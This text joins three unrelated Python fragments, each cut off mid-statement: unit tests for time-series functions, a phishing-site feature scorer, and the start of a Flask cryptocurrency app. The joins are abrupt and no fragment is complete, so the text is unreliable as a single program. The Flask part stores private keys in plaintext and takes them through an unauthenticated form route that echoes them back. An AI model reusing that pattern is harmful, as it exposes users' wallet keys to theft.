TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
expectedResult = [
TimeSeries('asPercent(collectd.test-db1.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0]),
TimeSeries('asPercent(collectd.test-db2.load.value,collectd.test-db2.load.value)',0,1,1,[None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0]),
TimeSeries('asPercent(collectd.test-db3.load.value,collectd.test-db3.load.value)',0,1,1,[100.0, 100.0, None, None, None, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, None, None, None]),
TimeSeries('asPercent(collectd.test-db4.load.value,collectd.test-db4.load.value)',0,1,1,[100.0, 100.0, 100.0, 100.0, None, 100.0, None, None, 100.0, 100.0, 100.0, None, 100.0, None, None, None, None, 100.0, 100.0, 100.0]),
TimeSeries('asPercent(collectd.test-db5.load.value,collectd.test-db5.load.value)',0,1,1,[100.0, 100.0, None, None, None, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, None, None])
]
result = functions.asPercent({}, seriesList, seriesList2)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_divideSeries_error(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
with self.assertRaisesRegexp(ValueError, "divideSeries second argument must reference exactly 1 series \(got 2\)"):
functions.divideSeries({}, seriesList, seriesList2)
def test_divideSeries_seriesList2_single(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
expectedResult = [
TimeSeries('divideSeries(collectd.test-db1.load.value,collectd.test-db1.load.value)',0,1,1,[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
TimeSeries('divideSeries(collectd.test-db2.load.value,collectd.test-db1.load.value)',0,1,1,[None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0]),
TimeSeries('divideSeries(collectd.test-db3.load.value,collectd.test-db1.load.value)',0,1,1,[1.0, 1.0, None, None, None, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, None, None, None]),
TimeSeries('divideSeries(collectd.test-db4.load.value,collectd.test-db1.load.value)',0,1,1,[1.0, 1.0, 1.0, 1.0, None, 1.0, None, None, 1.0, 1.0, 1.0, None, 1.0, None, None, None, None, 1.0, 1.0, 1.0]),
TimeSeries('divideSeries(collectd.test-db5.load.value,collectd.test-db1.load.value)',0,1,1,[1.0, 1.0, None, None, None, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, None, None])
]
result = functions.divideSeries({}, seriesList, seriesList2)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_multiplySeries_single(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
self.assertEqual(functions.multiplySeries({}, seriesList), seriesList)
def test_multiplySeries(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
expectedResult = [
TimeSeries('multiplySeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value)',0,1,1,[None, 32.0, None, None, None, 7776.0, None, None, None, 100000.0, None, None, None, None, None, None, None, None, None, None]),
]
result = functions.multiplySeries({}, seriesList)
self.assertEqual(result, expectedResult)
def _verify_series_consolidationFunc(self, seriesList, value):
"""
Verify the consolidationFunc is set to the specified value
"""
for series in seriesList:
self.assertEqual(series.consolidationFunc, value)
def test_cumulative(self):
seriesList = self._generate_series_list()
self._verify_series_consolidationFunc(seriesList, "average")
results = functions.cumulative({}, seriesList)
self._verify_series_consolidationFunc(results, "sum")
def test_consolidateBy(self):
seriesList = self._generate_series_list()
self._verify_series_consolidationFunc(seriesList, "average")
avail_funcs = ['sum', 'average', 'min', 'max']
for func in avail_funcs:
results = functions.consolidateBy({}, seriesList, func)
self._verify_series_consolidationFunc(results, func)
def test_weightedAverage(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList:
series.pathExpression = series.name
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList2:
series.pathExpression = series.name
expectedResult = [
TimeSeries('weightedAverage(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value, collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value, 1)',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
result = functions.weightedAverage({}, seriesList, seriesList2, 1)
self.assertEqual(result, expectedResult)
def test_weightedAverage_mismatched_series(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList:
series.pathExpression = series.name
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList2:
series.pathExpression = series.name
expectedResult = [
TimeSeries('weightedAverage(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db5.load.value, collectd.test-db1.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value, 1)',0,1,1,[0.75,1.5,1.5,2.0,5.0,4.5,7.0,8.0,6.75,7.5,8.25,12.0,9.75,14.0,15.0,16.0,17.0,12.0,9.5,10.0]),
]
result = functions.weightedAverage({}, seriesList, seriesList2, 1)
self.assertEqual(result, expectedResult)
def test_scaleToSeconds(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,2,None,4,None,6,None,8,None,10]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('scaleToSeconds(collectd.test-db1.load.value,30)',0,600,60,[0.5,1.0,1.5,2.0,2.5,3.0,3.5,4.0,4.5,5.0]),
TimeSeries('scaleToSeconds(collectd.test-db2.load.value,30)',0,600,60,[None,1.0,None,2.0,None,3.0,None,4.0,None,5.0]),
TimeSeries('scaleToSeconds(collectd.test-db3.load.value,30)',0,600,60,[0.5,1.0,None,None,None,3.0,3.5,4.0,4.5,5.0]),
TimeSeries('scaleToSeconds(collectd.test-db4.load.value,30)',0,600,60,[0.5,1.0,1.5,2.0,2.5,3.0,3.5,4.0,4.5,None]),
]
result = functions.scaleToSeconds({}, seriesList, 30)
self.assertEqual(result, expectedResult)
def test_absolute(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,21,1,[-10,-9,-8,-7,None,-5,-4,-3,-2,-1,0,1,2,3,4,5,6,7,8,9,10]),
]
expected = [
TimeSeries('absolute(collectd.test-db1.load.value)',0,21,1,[10,9,8,7,None,5,4,3,2,1,0,1,2,3,4,5,6,7,8,9,10]),
]
self.assertEqual(functions.absolute({}, seriesList), expected)
def test_offset(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,21,1,[-10,-9,-8,-7,None,-5,-4,-3,-2,-1,0,1,2,3,4,5,6,7,8,9,10]),
]
expected = [
TimeSeries('offset(collectd.test-db1.load.value,10)',0,21,1,[0,1,2,3,None,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
self.assertEqual(functions.offset({}, seriesList, 10), expected)
def test_offsetToZero(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,21,1,[-10,-9,-8,-7,None,-5,-4,-3,-2,-1,0,1,2,3,4,5,6,7,8,9,10]),
]
expected = [
TimeSeries('offsetToZero(collectd.test-db1.load.value)',0,21,1,[0,1,2,3,None,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
self.assertEqual(functions.offsetToZero({}, seriesList), expected)
def test_derivative(self):
seriesList = [TimeSeries('test', 0, 600, 60, [None, 1, 2, 3, 4, 5, None, 6, 7, 8])]
expected = [TimeSeries('derivative(test)', 0, 600, 60, [None, None, 1, 1, 1, 1, None, None, 1, 1])]
result = functions.derivative({}, seriesList)
self.assertEqual(expected, result, 'derivative result incorrect')
def test_nonNegativeDerivative(self):
seriesList = [TimeSeries('test', 0, 600, 60, [None, 1, 2, 3, 4, 5, None, 3, 2, 1])]
expected = [TimeSeries('nonNegativeDerivative(test)', 0, 600, 60, [None, None, 1, 1, 1, 1, None, None, None, None])]
result = functions.nonNegativeDerivative({}, seriesList)
self.assertEqual(expected, result, 'nonNegativeDerivative result incorrect')
def test_nonNegativeDerivative_max(self):
seriesList = [TimeSeries('test', 0, 600, 60, [0, 1, 2, 3, 4, 5, 0, 1, 2, 3])]
expected = [TimeSeries('nonNegativeDerivative(test)', 0, 600, 60, [None, 1, 1, 1, 1, 1, 1, 1, 1, 1])]
result = functions.nonNegativeDerivative({}, seriesList,5)
self.assertEqual(expected, result, 'nonNegativeDerivative result incorrect')
def test_perSecond(self):
seriesList = [TimeSeries('test', 0, 600, 60, [0, 120, 240, 480, 960, 1920, 3840, 7680, 15360, 30720])]
expected = [TimeSeries('perSecond(test)', 0, 600, 60, [None, 2, 2, 4, 8, 16, 32, 64, 128, 256])]
result = | |
totalLinks = 0
externalLinks = 0
m = []
for p in self.soup.find_all("img"):
if p.has_attr("src") and "http" in p.get("src")[:4]:
m.append(p.get('src'))
for p in self.soup.find_all("video"):
for q in p.find_all("source"):
if q.has_attr("src") and "http" in q.get("src")[:4]:
m.append(q.get('src'))
for p in self.soup.find_all("audio"):
for q in p.find_all("source"):
if q.has_attr("src") and "http" in q.get("src")[:4]:
m.append(q.get('src'))
for link in m:
if self.domain not in link:
externalLinks += 1
totalLinks += 1
if totalLinks != 0:
percentage = externalLinks / totalLinks
if percentage >= 0.61:
self.requestedWeight = 1
return
elif percentage >= 0.22:
self.requestedWeight = 0.5
return
self.requestedWeight = 0
return
def anchors_testing(self):
"""
test the percentage of external links anchors
:return: -1,0 or 1
"""
tags = self.soup.findAll("a", href=True)
anchors = []
for tag in tags:
anchors.append(tag.get("href"))
totalLink = len(anchors)
externalLinks = 0
for anchor in anchors:
if self.domain not in anchor and "http":
if "www" in anchor[:3] or "http" in anchor[:4]:
externalLinks += 1
if externalLinks == 0 or externalLinks / totalLink < 0.31:
self.anchorsWeight = 0
return
elif externalLinks / totalLink <= 0.67:
self.anchorsWeight = 0.5
return
self.anchorsWeight = 1
return
def tags_links_testing(self):
"""
test the percentage of external links into meta, script and link tags
:return: -1,0 or 1
"""
totalLinks = 0
externalLinks = 0
m = []
meta = self.soup.find_all("meta")
links = self.soup.find_all("link")
scripts = self.soup.find_all("script")
for tag in meta:
for link in re.findall(re.compile("\"http.*?\""), str(tag)):
m.append(link)
for tag in links:
if tag.has_attr("href") and "http" in tag.get("href")[:4]:
m.append(tag.get("href"))
for tag in scripts:
if tag.has_attr("href") and "http" in tag.get("href")[:4]:
m.append(tag.get("href"))
for link in m:
if self.domain not in link:
externalLinks += 1
totalLinks += 1
if totalLinks != 0:
percentage = externalLinks / totalLinks
if percentage >= 0.81:
self.tagWeight = 1
return
elif percentage >= 0.05:
self.tagWeight = 0.5
return
self.tagWeight = 0
return
def sfh_testing(self):
"""
test if the Server Form Handler of all forms is not suspicious
:return: -1,0 or 1
"""
for form in self.soup.find_all("form"):
if str(form.get("action")) == "":
self.SFHWeight = 1
return
elif str(form.get("action")) == "about:blank":
self.SFHWeight = 1
return
elif self.domain not in str(form.get("action")) and ("http" in str(form.get("action")) or "www" in str(
form.get("action"))):
self.SFHWeight = 0.5
return
self.SFHWeight = 0
return
def email_testing(self):
"""
test if no user's informations are send by email
:return: -1 or 1
"""
# soup = BeautifulSoup(html, features="lxml")
if "mail(" in str(self.html).lower():
self.emailWeight = 1
return
elif "mailto:" in str(self.html).lower():
self.emailWeight = 1
return
self.emailWeight = 0
return
def abnormal_url_testing(self):
"""
test if registrant name is in the url
:return: -1 or 1
"""
if self.whoisDomain is not None:
domain = self.whoisDomain.domain.split(".")[0]
if "org" in self.whoisDomain:
if type(self.whoisDomain["org"]) == list:
for org in self.whoisDomain["org"]:
for suborg in re.split(". | ", org):
if suborg.lower() in domain.lower():
self.abnormalWeight = 0
return
elif self.whoisDomain["org"] is not None:
for suborg in re.split(". | ", self.whoisDomain["org"]):
if suborg.lower() in domain.lower():
self.abnormalWeight = 0
return
if "org1" in self.whoisDomain:
if type(self.whoisDomain["org1"]) == list:
for org in self.whoisDomain["org1"]:
for suborg in re.split(". | ", org):
if suborg.lower() in domain.lower():
self.abnormalWeight = 0
return
elif self.whoisDomain["org1"] is not None:
for suborg in re.split(". | ", self.whoisDomain["org1"]):
if suborg.lower() in domain.lower():
self.abnormalWeight = 0
return
self.abnormalWeight = 1
return
def forwarding_testing(self):
"""
test the number of forwarding
:return: -1,0 or 1
"""
try:
countForward = len(requests.get(self.http + "://" + self.url).history)
except requests.exceptions.ConnectionError:
try:
countForward = len(requests.get(self.http + "://" + self.url).history)
except requests.exceptions.ConnectionError:
return
if countForward <= 1:
self.forwardWeight = 0
return
if countForward < 4:
self.forwardWeight = 0.5
return
self.forwardWeight = 1
return
def bar_custom_testing(self):
"""
Check if the status bar is not abnormally modify
:return: -1, 0 or 1
"""
for tag in self.soup.find_all(onmouseover=True):
if "window.status" in str(tag).lower():
self.barCustomWeight = 1
return
else:
self.barCustomWeight = 0.5
return
self.barCustomWeight = 0
return
def right_click_testing(self):
"""
test if the right click is not disabled
:return: -1 or 1
"""
if "contextmenu" in str(self.html).lower():
self.rightClickWeight = 1
return
self.rightClickWeight = 0
def popup_testing(self):
"""
testing if popup with text fields
:return: -1, 0 or 1
"""
prompt = re.findall(r"prompt\(", str(self.html)) + re.findall(r"confirm\(", str(self.html)) + re.findall(
r"alert\(", str(self.html))
if prompt:
if len(prompt) > 3:
self.popupWeight = 1
return
if len(prompt) >= 1:
self.popupWeight = 0.5
return
self.popupWeight = 0
def iframe_testing(self):
"""
testing if the site use Iframe
:return: -1 or 1
"""
for frame in self.soup.find_all("iframe"):
if frame.get("src") is not None and self.domain not in frame.get("src"):
if "www" in frame.get("src") or "http" in frame.get("src"):
self.iFrameWeight = 1
return
self.iFrameWeight = 0
def domain_age_testing(self):
"""
testing if domain age is greater than 6 months
:return: -1, 0 or 1
"""
if self.whoisDomain is not None:
now = datetime.datetime.now()
creation = self.whoisDomain.creation_date
if type(creation) == list:
creation = creation[0]
try:
delta = now - creation
except:
self.domainAgeWeight = 0.5
return
if delta.days > 1095:
self.domainAgeWeight = 0
return
elif delta.days > 365:
self.domainAgeWeight = 0.5
return
else:
self.domainAgeWeight = 1
return
else:
self.domainAgeWeight = 1
def dns_record_testing(self):
"""
test if the domain is recorded in a DNS
:return: -1 or 1
"""
if len(self.hostname.split("www.")) == 2:
domain = self.hostname.split("www.")[1]
else:
domain = self.hostname
try:
empty = True
resolver = dns.resolver.Resolver()
answer = resolver.query(domain, "NS")
i = 0
while empty and i < len(answer):
if answer[i].target != "":
empty = False
i += 1
except:
self.dnsWeight = 1
return
if not empty:
self.dnsWeight = 0
return
self.dnsWeight = 1
def traffic_testing(self):
"""
collect the website rank on AWIS database and test if it is not abnormal
:return: -1,0 or 1
"""
try:
soup = BeautifulSoup(self.amazonAlexa, features="lxml")
rank = int(soup.find("aws:trafficdata").find("aws:rank").contents[0])
except (AttributeError, IndexError):
try:
soup = BeautifulSoup(requests.get("https://www.alexa.com/siteinfo/" + self.domain).content,
features="lxml")
tag = soup.find(id="card_rank").find("", {"class": "rank-global"}).find("", {"class": "big data"})
rank = int("".join(re.findall('\d+', str(tag))))
except(AttributeError, IndexError):
self.trafficWeight = 1
return
if rank > 100000:
self.trafficWeight = 0.5
return
self.trafficWeight = 0
def page_rank_testing(self):
"""
Test the pagerank of the domain
:return: -1 or 1
"""
if self.pageRank <= 2:
self.pageRankWeight = 1
return
elif self.pageRank <= 4:
self.pageRankWeight = 0.5
else:
self.pageRankWeight = 0
return
def google_index_testing(self):
"""
test if url is indexed by google
:return: -1 or 1
"""
index = googleApi.google_search("site:" + self.url)
if index:
self.indexingWeight = 0
return
self.indexingWeight = 1
def links_pointing_to_testing(self):
"""
collect the count of all sites which linked to the url on AWIS database and test if it is not abnormal
:return: -1,0 or 1
"""
soup = BeautifulSoup(self.amazonAlexa, features="lxml")
try:
countLinks = int(soup.find("aws:linksincount").contents[0])
except (AttributeError, IndexError):
try:
soup = BeautifulSoup(requests.get("https://www.alexa.com/siteinfo/" + self.url).content,
features="lxml")
countLinks = int(
"".join(soup.find("", {"class": "linksin"}).find("", {"class": "big data"}).get_text().split(",")))
except(AttributeError, IndexError):
self.linksWeight = 1
return
if countLinks < 5:
self.linksWeight = 1
return
elif countLinks < 30:
self.linksWeight = 0.5
return
self.linksWeight = 0
def statistic_report_testing(self):
"""
test if the ip address of the domain is in top 50 of www.stopbadware.org
:return: -1 or 1
"""
try:
IPdomain = socket.gethostbyname(self.hostname)
except socket.gaierror:
self.statisticWeight = 0
return
jsonDictIP = json.loads(
requests.post("https://www.stopbadware.org/sites/all/themes/sbw/clearinghouse.php",
data={'q': 'tops'}).text)
IPList = []
for site in jsonDictIP['top_ip']:
IPList.append(socket.inet_ntoa(struct.pack('!L', int(site['ip_addr']))))
for ip in IPList:
if ip == IPdomain:
self.statisticWeight = 1
return
self.statisticWeight = 0
def sub_domain_length_testing(self):
"""
Use to calculate the weight of the mean of lengh subdomains
:return:
"""
domain = self.hostname
psl = PublicSuffixList()
psl.accept_unknown = False
if domain is None:
domain = ""
else:
try:
domain = domain[:len(domain) - (len(psl.publicsuffix(domain)) + 1)]
except TypeError:
pass
subdomains = domain.split(".")
total = 0
for subdomain in subdomains:
total += len(subdomain)
if total / len(subdomains) > 15:
self.subDomainLengthWeight = 1
return
elif total / len(subdomains) > 9:
self.subDomainLengthWeight = 0.5
return
self.subDomainLengthWeight = 0
def www_testing(self):
"""
test if www is at the beginning of url
:return:
"""
if "www" in self.url[:11]:
self.wwwWeight = 0
return
self.wwwWeight = 1
def valid_tld_testing(self):
"""
test if the tld of url is valid
:return:
"""
psl = PublicSuffixList()
psl.accept_unknown = False
if psl.publicsuffix(self.hostname) is None:
self.validTldWeight = 1
return
self.validTldWeight | |
<gh_stars>1-10
from flask import Flask, render_template, request, redirect, url_for, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from werkzeug.utils import secure_filename
import os
import json
import mining
with open("info.json", "r") as c:
parameters = json.load(c)["parameters"]
app = Flask(__name__)
# Project specific Confrigration
app.config['SQLALCHEMY_DATABASE_URI'] = parameters["database"]
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = parameters["track_modifications"]
app.config['SECRET_KEY'] = parameters["secret_key"]
app.config['UPLOAD_FOLDER'] = parameters["UPLOAD_FOLDER"]
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
gas_price_minting = 2
addres_key_admin = "0x9109C4575a824535bAc4efA008Ed4E81DFf8755E"
class Blockchain(db.Model):
id = db.Column(db.Integer, primary_key = True)
desc_transfer = db.Column(db.String(512), nullable = False)
prev_hash = db.Column(db.String(512), nullable = False)
sender_id = db.Column(db.String(512), nullable = False)
reciver_id = db.Column(db.String(512), nullable = False)
transaction_amt = db.Column(db.Float, nullable = False)
new_hash = db.Column(db.String(512), nullable = False)
addres_key_miner = db.Column(db.String(512), nullable = False)
nonce = db.Column(db.Integer, nullable = False)
def __repr__(self):
return str(self.id) + ': New Hash: ' + self.new_hash + ' Previous Hash: ' + self.prev_hash + ' '
class Blockchain_Waiting(db.Model):
id = db.Column(db.Integer, primary_key = True)
desc_transfer = db.Column(db.String(512), nullable = False)
sender_id = db.Column(db.String(512), nullable = False)
reciver_id = db.Column(db.String(512), nullable = False)
transaction_amt = db.Column(db.Float, nullable = False)
def __repr__(self):
return str(self.id) + ': ' + ' transaction_amt: ' + str(self.transaction_amt)
class Keys(db.Model):
id = db.Column(db.Integer, primary_key = True)
private_key = db.Column(db.String(512), nullable = False)
addres_key = db.Column(db.String(512), nullable = False)
def __repr__(self):
return str(self.id) + ': Addres: ' + self.addres_key
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key = True)
name = db.Column(db.String(512), nullable = False)
dob = db.Column(db.String(512), nullable = False)
addres_key = db.Column(db.String(512), nullable = False)
private_key = db.Column(db.String(512), nullable = False)
pan_no = db.Column(db.String(512), nullable = False)
mobile_no = db.Column(db.String(512), nullable = False)
current_balance = db.Column(db.Float, default = 0, nullable = False)
miner_status = db.Column(db.Boolean, default = False, nullable = False)
loan_status = db.Column(db.Boolean, default = False, nullable = False)
loan_taken = db.Column(db.Boolean, default = False, nullable = False)
blocks_mined = db.Column(db.Integer, default = 0, nullable = False)
wallet_balance = db.Column(db.Float, default = 0, nullable = False)
def __repr__(self):
return str(self.id) + ': Addres : ' + self.addres_key + ' Miner status: ' + str(self.miner_status) + ' Name: ' + str(self.name)
class Crowdsourcing(db.Model):
id = db.Column(db.Integer, primary_key=True)
addres_key = db.Column(db.String(512), nullable=False)
problem_desc = db.Column(db.Text(), nullable=False)
title_desc = db.Column(db.String(512), nullable=False)
target_required = db.Column(db.Float, nullable=False)
def __repr__(self):
return str(self.id) + ': Addres : ' + self.addres_key + ' title_desc: ' + self.title_desc
class Nfts(db.Model):
id = db.Column(db.Integer, primary_key=True)
hash_nft = db.Column(db.String(512), nullable = False)
location_addres = db.Column(db.String(512), nullable=False)
addres_owner = db.Column(db.String(512), nullable=False)
tittle_nft = db.Column(db.String(512), nullable=False)
desc_nft = db.Column(db.Text(), nullable=False)
price_nft = db.Column(db.Float, default = 1, nullable = False)
def __repr__(self):
return str(self.id) + ': Hash of nft: ' + str(self.hash_nft) + ' price: ' + str(self.price_nft) + ' tittle_nft: ' + str(self.tittle_nft)
class MakeModel(db.Model):
id = db.Column(db.Integer, primary_key=True)
addres_key = db.Column(db.String(512), nullable=False)
no_of_hash = db.Column(db.Integer, nullable=False)
no_of_blocks_mined = db.Column(db.Integer, default = 0, nullable = False)
def __repr__(self):
return str(self.id) + ' Addres of the Miner ' + self.addres_key + ' no_of_hash: ' + str(self.no_of_hash) + ' no_of_blocks_mined: ' + str(self.no_of_blocks_mined)
class LoanStats(db.Model):
id = db.Column(db.Integer, primary_key=True)
addres_key = db.Column(db.String(512), nullable=False)
amt_on_loan = db.Column(db.Float, nullable=False)
amt_paid = db.Column(db.Float, default = 0, nullable = False)
def __repr__(self):
return str(self.id) + ' addres_key: ' + str(self.addres_key) + ' amt_on_loan: ' + str(self.amt_on_loan) + ' amt_paid: ' + str(self.amt_paid)
class CoinManager(db.Model):
id = db.Column(db.Integer, primary_key = True)
addres_key = db.Column(db.String(512), nullable = False)
private_key = db.Column(db.String(512), nullable = False)
total_coin = db.Column(db.Float, default = 0, nullable = False)
total_given = db.Column(db.Float, default = 0, nullable = False)
total_money_in_network = db.Column(db.Float, default = 0, nullable = False)
total_given_to_miners = db.Column(db.Float, default = 0, nullable = False)
def __repr__(self):
return str(self.id) + ': Total coin in network: ' + str(self.total_coin) + ' Total coin bought: ' + str(self.total_given) + ' Total Mine reward: ' + str(self.total_given_to_miners)
@login_manager.user_loader
def load_user(id):
return User.query.get(int(id))
@app.route('/', methods = ['GET', 'POST'])
def index():
if request.method == 'POST':
private_key = request.form.get('private_key')
addres_key = request.form.get('addres_key')
if private_key and addres_key:
add_key = Keys(private_key = private_key, addres_key = addres_key)
db.session.add(add_key)
db.session.commit()
return render_template('admin.html', msg = jsonify({'addres_key': addres_key,
'private_key' : private_key}))
